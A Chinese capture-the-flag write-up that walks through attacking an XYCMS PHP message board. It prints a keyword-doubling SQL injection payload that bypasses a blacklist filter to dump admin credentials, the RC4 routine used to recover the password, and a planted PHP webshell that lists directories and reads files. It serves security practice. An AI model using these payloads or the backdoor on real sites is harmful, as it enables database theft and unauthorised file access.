打开题目
TIM截图20170322162939.png
一个XYCMS搭建的PHP留言板,据说是一道代码审计。
进去后随便翻翻发现这个
TIM截图20170322163354.png
点进去,然后
TIM截图20170322163510.png
一处代码读取,默认参数是suanfa.php。读取一下include.php
$file = $_GET['file'];
if ($file == "" || strstr($file, 'Conf/xycms.inc.php')) {
echo "想多了,数据库信息能让你看";
exit;
} else {
$cut = strchr($file, "login");
if ($cut == false) {
$data = file_get_contents($file);
$date = htmlspecialchars($data);
echo $date;
} else {
echo "";
}
}
?>
伪代码读取,而且发现存在login目录。然后发现其他的几个文件,比较重要的有medium.php存在sql注入
if ($_SERVER['HTTP_USER_AGENT'] != "seclover Browser") {
echo '没用的!!!';
exit;
}
$id = $_POST['soid'];
include 'Conf/xycms.inc.php';
include 'seclover.php';
include 'filter.php';
$id = seclover($id);
$con = mysql_connect($db_address, $db_user, $db_pass) or die("不能连接到数据库!!" . mysql_error());
mysql_select_db($db_name, $con);
$id = mysql_real_escape_string($id);
$sql = "SELECT * FROM message WHERE display=1 AND id={$id}";
//echo $sql;
$result = mysql_query($sql);
$rs = mysql_fetch_array($result);
echo htmlspecialchars($rs['nice']) . ':
' . filter($rs['say']) . '
';
mysql_free_result($result);
//mysql_free_result($file);
mysql_close($con);
?> seclover.php过滤规则
function seclover($content)
{
$keyword = array("select", "union", "and", "from", ' ', "'", ";", '"', "char", "or", "count", "master", "name", "pass", "admin", "+", "-", "order", "=");
$info = strtolower($content);
for ($i = 0; $i <= count($keyword); $i++) {
$info = str_replace($keyword[$i], '', $info);
}
return $info;
}
所以可以利用搜索功能进行注入,由于medium.php对UA进行验证所以抓包改一下UA得到:
TIM截图20170322164709.png
根据过滤规则可以用ununionion的方式绕过关键字的过滤,用/**/注释绕过空格的过滤。
TIM截图20170322165553.png
soid=1/ /aandnd//1>2/ /ununionion//selselectect/ /1,2,3,group_concat(usernanameme,userpapassss)//frfromom/ /adadminmin//limit/**/0,1
得到
TIM截图20170322175323.png
密码是加密过的,然后想到之前的suanfa.php
base64_encode(rc4($content, "yangrong"));
function rc4($data, $pwd)
{
$cipher = "";
$key[] = "";
$box[] = "";
$pwd_length = strlen($pwd);
$data_length = strlen($data);
for ($i = 0; $i < 256; $i++) {
$key[$i] = ord($pwd[$i % $pwd_length]);
$box[$i] = $i;
}
for ($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $key[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for ($a = $j = $i = 0; $i < $data_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$k = $box[($box[$a] + $box[$j]) % 256];
$cipher .= chr(ord($data[$i]) ^ $k);
}
return $cipher;
}
先将密码进行rc4加密,然后再进行b64加密。
而rc4的解密方法就是将加密后的字符串再加密一次,所以只需要简单修改一下加密算法:
echo rc4(base64_decode('Cj7+2VxVao1/S5YESfmKwcA='),'yangrong');
得到密码:
helloevery1.2.3.4
然后登录后台得到:
TIM截图20170322175907.png
然后读取马的内容:
$pwd = "cmd00";
if (isset($_POST[$pwd]) && !empty($_POST[$pwd])) {
$cmd = $_POST['cmd'];
$path = $_POST['path'];
switch ($cmd) {
case 'ls':
echo @FileTreeCode($path);
break;
case 'cat':
echo @file_get_contents($path);
break;
default:
die('Command Not Found Or No Permission!');
break;
}
}
function FileTreeCode($D)
{
$ret = "";
$F = @opendir($D);
if ($F == NULL) {
$ret = "ERROR:// Path Not Found Or No Permission!";
} else {
$M = NULL;
$L = NULL;
while ($N = @readdir($F)) {
$P = $D . "/" . $N;
$T = @date("Y-m-d H:i:s", @filemtime($P));
@($E = substr(base_convert(@fileperms($P), 10, 8), -4));
$R = "\t" . $T . "\t" . @filesize($P) . "\t" . $E . "\n";
if (@is_dir($P)) {
$M .= $N . "/" . $R;
} else {
$L .= $N . $R;
}
}
$ret .= $M . $L;
@closedir($F);
}
return $ret;
}
构造请求:
TIM截图20170322180210.png
得到flag文件 ,然后利用cat输出flag:
TIM截图20170322180359.png